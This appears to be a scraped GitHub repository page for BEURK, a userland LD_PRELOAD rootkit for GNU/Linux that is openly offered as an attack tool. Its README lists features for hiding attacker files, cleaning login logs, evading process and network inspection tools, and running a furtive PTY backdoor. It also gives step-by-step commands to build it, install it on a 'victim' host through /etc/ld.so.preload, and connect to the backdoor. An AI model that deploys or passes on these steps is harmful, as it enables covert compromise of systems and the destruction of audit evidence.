Skip to content
dev
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
src
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

README.md

BEURK

Getting Started | API Documentation | Contributing | TODO List

Travis Build Ready Issues Coverage Status Jenkins Build Join the chat at https://gitter.im/unix-thrust/beurk

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

S'ils savaient, ils vomiraient ...

- The core team -


Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:

  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection

Example on debian:

    apt-get install libpcap-dev libpam-dev libssl-dev

Waffle metrics

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit


About

BEURK Experimental Unix RootKit

Resources

License

Releases

No releases published

Packages

No packages published
You can’t perform that action at this time.